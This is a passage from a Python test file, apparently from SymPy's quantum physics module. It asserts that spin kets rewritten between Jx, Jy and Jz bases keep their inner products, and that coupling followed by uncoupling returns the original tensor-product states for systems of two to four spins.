WignerD(j, mi, m, 0, pi * Rational(3, 2), 0) * JxKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
assert JxKetCoupled(j, m, (j1, j2)).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), 0, 0) * JyKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
assert JzKetCoupled(j, m, (j1, j2)).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)
assert JxKetCoupled(j, m, (j1, j2)).rewrite("Jz") == Sum(
WignerD(j, mi, m, 0, pi / 2, 0) * JzKetCoupled(j, mi, (j1, j2)), (mi, -j, j)
)
assert JyKetCoupled(j, m, (j1, j2)).rewrite("Jz") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* JzKetCoupled(j, mi, (j1, j2)),
(mi, -j, j),
)


def test_innerproducts_of_rewritten_states():
# Numerical
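    # Rewriting a ket into another basis must leave inner products unchanged:
    # the overlap of a state with itself stays 1, orthogonal states stay 0.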
assert qapply(JxBra(1, 1) * JxKet(1, 1).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, 0) * JxKet(1, 0).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, -1) * JxKet(1, -1).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, 1) * JxKet(1, 1).rewrite("Jz")).doit() == 1
assert qapply(JxBra(1, 0) * JxKet(1, 0).rewrite("Jz")).doit() == 1
assert qapply(JxBra(1, -1) * JxKet(1, -1).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, 1) * JyKet(1, 1).rewrite("Jx")).doit() == 1
assert qapply(JyBra(1, 0) * JyKet(1, 0).rewrite("Jx")).doit() == 1
assert qapply(JyBra(1, -1) * JyKet(1, -1).rewrite("Jx")).doit() == 1
assert qapply(JyBra(1, 1) * JyKet(1, 1).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, 0) * JyKet(1, 0).rewrite("Jz")).doit() == 1
assert qapply(JyBra(1, -1) * JyKet(1, -1).rewrite("Jz")).doit() == 1
    assert qapply(JzBra(1, 1) * JzKet(1, 1).rewrite("Jx")).doit() == 1
    assert qapply(JzBra(1, 0) * JzKet(1, 0).rewrite("Jx")).doit() == 1
    assert qapply(JzBra(1, -1) * JzKet(1, -1).rewrite("Jx")).doit() == 1
assert qapply(JzBra(1, 1) * JzKet(1, 1).rewrite("Jy")).doit() == 1
assert qapply(JzBra(1, 0) * JzKet(1, 0).rewrite("Jy")).doit() == 1
assert qapply(JzBra(1, -1) * JzKet(1, -1).rewrite("Jy")).doit() == 1
assert qapply(JxBra(1, 1) * JxKet(1, 0).rewrite("Jy")).doit() == 0
assert qapply(JxBra(1, 1) * JxKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 1) * JxKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JxBra(1, 1) * JxKet(1, -1).rewrite("Jz")) == 0
assert qapply(JyBra(1, 1) * JyKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JyBra(1, 1) * JyKet(1, -1).rewrite("Jx")) == 0
assert qapply(JyBra(1, 1) * JyKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JyBra(1, 1) * JyKet(1, -1).rewrite("Jz")) == 0
assert qapply(JzBra(1, 1) * JzKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JzBra(1, 1) * JzKet(1, -1).rewrite("Jx")) == 0
assert qapply(JzBra(1, 1) * JzKet(1, 0).rewrite("Jy")).doit() == 0
assert qapply(JzBra(1, 1) * JzKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, 1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, 1).rewrite("Jz")) == 0
assert qapply(JxBra(1, 0) * JxKet(1, -1).rewrite("Jz")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, 1).rewrite("Jx")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, -1).rewrite("Jx")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, 1).rewrite("Jz")) == 0
assert qapply(JyBra(1, 0) * JyKet(1, -1).rewrite("Jz")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, 1).rewrite("Jx")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, -1).rewrite("Jx")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, 1).rewrite("Jy")) == 0
assert qapply(JzBra(1, 0) * JzKet(1, -1).rewrite("Jy")) == 0
assert qapply(JxBra(1, -1) * JxKet(1, 1).rewrite("Jy")) == 0
assert qapply(JxBra(1, -1) * JxKet(1, 0).rewrite("Jy")).doit() == 0
assert qapply(JxBra(1, -1) * JxKet(1, 1).rewrite("Jz")) == 0
assert qapply(JxBra(1, -1) * JxKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JyBra(1, -1) * JyKet(1, 1).rewrite("Jx")) == 0
assert qapply(JyBra(1, -1) * JyKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JyBra(1, -1) * JyKet(1, 1).rewrite("Jz")) == 0
assert qapply(JyBra(1, -1) * JyKet(1, 0).rewrite("Jz")).doit() == 0
assert qapply(JzBra(1, -1) * JzKet(1, 1).rewrite("Jx")) == 0
assert qapply(JzBra(1, -1) * JzKet(1, 0).rewrite("Jx")).doit() == 0
assert qapply(JzBra(1, -1) * JzKet(1, 1).rewrite("Jy")) == 0
assert qapply(JzBra(1, -1) * JzKet(1, 0).rewrite("Jy")).doit() == 0


def test_uncouple_2_coupled_states():
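    # uncouple(couple(state)) should round-trip: after expand(), the result
    # reproduces the original product-basis state for every combination below.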
# j1=1/2, j2=1/2
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half))))
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)))
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))))
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
# j1=1/2, j2=1
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1))))
)
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0))))
)
assert TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1))))
)
assert TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1))))
)
assert TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0))))
)
assert TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1))))
)
# j1=1, j2=1
assert TensorProduct(JzKet(1, 1), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 1), JzKet(1, 1))))
)
assert TensorProduct(JzKet(1, 1), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 1), JzKet(1, 0))))
)
assert TensorProduct(JzKet(1, 1), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 1), JzKet(1, -1))))
)
assert TensorProduct(JzKet(1, 0), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 0), JzKet(1, 1))))
)
assert TensorProduct(JzKet(1, 0), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 0), JzKet(1, 0))))
)
assert TensorProduct(JzKet(1, 0), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, 0), JzKet(1, -1))))
)
assert TensorProduct(JzKet(1, -1), JzKet(1, 1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, -1), JzKet(1, 1))))
)
assert TensorProduct(JzKet(1, -1), JzKet(1, 0)) == expand(
uncouple(couple(TensorProduct(JzKet(1, -1), JzKet(1, 0))))
)
assert TensorProduct(JzKet(1, -1), JzKet(1, -1)) == expand(
uncouple(couple(TensorProduct(JzKet(1, -1), JzKet(1, -1))))
)


def test_uncouple_3_coupled_states():
# Default coupling
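    # With no coupling scheme supplied, couple() uses its default ordering of
    # the spaces; the round trip must still give back the product state.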
# j1=1/2, j2=1/2, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# j1=1/2, j2=1, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half))
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half))
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# Coupling j1+j3=j13, j13+j2=j
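    # The scheme is given to couple() as a sequence of index pairs: (1, 3)
    # couples spaces 1 and 3 first, then (1, 2) couples that intermediate
    # result with space 2, matching the j1+j3=j13, j13+j2=j coupling above.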
# j1=1/2, j2=1/2, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
# j1=1/2, j2=1, j3=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(S.Half, Rational(-1, 2))
) == expand(
uncouple(
couple(
TensorProduct(
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
)
)


@slow
def test_uncouple_4_coupled_states():
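    # Marked @slow: the four-spin round trips below expand into large
    # Clebsch-Gordan sums and take noticeably longer than the other tests.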
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
                    JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
                    JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
                    JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
                    JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
                    JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
                    JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
                    JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# j1=1/2, j2=1/2, j3=1, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
